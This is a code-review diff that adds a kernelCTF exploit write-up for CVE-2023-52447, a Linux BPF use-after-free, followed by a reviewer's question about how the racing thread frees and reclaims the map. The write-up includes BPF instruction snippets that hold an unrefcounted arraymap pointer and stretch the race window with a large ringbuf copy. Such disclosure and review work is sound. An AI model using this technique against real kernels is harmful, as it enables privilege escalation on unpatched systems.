pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md

```diff
@@ -0,0 +1,183 @@
+# Exploit Tech Overview
+
+The vulnerability is that bpf program can hold arraymap pointer without increase refcount if it's from array_of_maps.  
+If bpf first stores a arraymap pointer into one register, and do some time consume operation in the middle of program.  
+It gives other thread chance to free that arraymap can reclaim it to another structure like array_of_maps.  
+
+```C
+//store a arraymap from array_of_map without increase refcount at BPF_REG_8
+BPF_LD_MAP_FD(BPF_REG_9, array_of_map),
+BPF_MAP_GET_ADDR(0, BPF_REG_8),
+BPF_MOV64_REG(BPF_REG_9, BPF_REG_8),
+BPF_MAP_GET_ADDR(0,BPF_REG_8),
+```
+
+`bpf_ringbuf_output` is a bpf function that use memcpy to copy buf to into another buf in line [1].    
+```C
+BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size,
+	   u64, flags)
+{
+	struct bpf_ringbuf_map *rb_map;
+	void *rec;
+
+	if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP)))
+		return -EINVAL;
+
+	rb_map = container_of(map, struct bpf_ringbuf_map, map);
+	rec = __bpf_ringbuf_reserve(rb_map->rb, size);
+	if (!rec)
+		return -EAGAIN;
+
+	memcpy(rec, data, size); //[1]
+	bpf_ringbuf_commit(rec, flags, false /* discard */);
+	return 0;
+}
+```
+
+If buf size is large, it will take some time to finish.  
+It will be a good choice to extend the race windows for release and reclaim.  
+
+```C
+// do time comsume operation using BPF_FUNC_ringbuf_output copy large size buffer
+BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
+BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),
+BPF_MOV64_IMM(BPF_REG_3, 0x10000000),
+BPF_MOV64_IMM(BPF_REG_4, 0x0),
+BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output)
+```
+
+Another thread can free the arraymap and reclaim as array_of_maps.  
```

Comment:
Could you elaborate on how a different thread free's the arraymap and the details on how to reclaim it as an array_of_maps? The exploit mentions using another thread to free the array_map while the BPF program is running, but it doesn't elaborate on:
- Why multi-threading or forking is necessary for this exploit
- How the threads are synchronized (e.g., barriers, signals, etc.)
- What data is shared between the threads